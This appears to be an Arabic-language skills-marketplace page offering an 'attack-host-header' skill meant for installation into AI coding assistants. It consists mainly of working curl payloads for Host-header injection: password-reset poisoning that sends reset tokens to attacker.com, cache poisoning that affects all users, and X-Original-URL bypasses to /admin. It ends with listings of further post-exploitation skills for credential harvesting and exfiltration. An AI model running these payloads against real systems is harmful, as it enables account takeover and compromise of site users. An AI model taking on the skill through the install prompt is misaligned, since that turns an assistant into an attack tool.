القائمة
Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
| name | attack-host-header |
| description | Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["host-header","web","injection","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-644"] |
| chains_with | ["attack-cache-poison","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-cache-poison":"Host header + cache poisoning = stored attack affecting all users"} |
Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.
# Trigger password reset with injected Host
curl -X POST https://TARGET/forgot-password \
-H "Host: attacker.com" \
-d "email=victim@example.com"
# X-Forwarded-Host variant
curl -X POST https://TARGET/forgot-password \
-H "X-Forwarded-Host: attacker.com" \
-d "email=victim@example.com"
If the reset email link contains attacker.com, the token is leaked when victim clicks.
# Two Host headers
curl https://TARGET/ \
-H "Host: TARGET" \
-H "Host: attacker.com"
# Host with port injection
curl https://TARGET/ \
-H "Host: TARGET:@attacker.com"
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
curl https://TARGET/ -H "X-Host: attacker.com"
curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"
curl https://TARGET/ -H "X-Original-URL: /admin"
curl https://TARGET/ -H "X-Rewrite-URL: /admin"
# Absolute URL overrides Host header
curl "https://TARGET/api" \
-H "Host: internal-admin.TARGET"
# If response is cached with injected host
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com" -H "X-Cache: miss"
# Subsequent requests from any user will get poisoned response
| Finding | Severity |
|---|---|
| Password reset link contains injected host | Critical (P1) |
| Cache poisoned with injected host/links | High (P2) |
| Internal routing bypass (access /admin) | High (P2) |
| Host header reflected in page without sanitization | Medium (P3) |
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools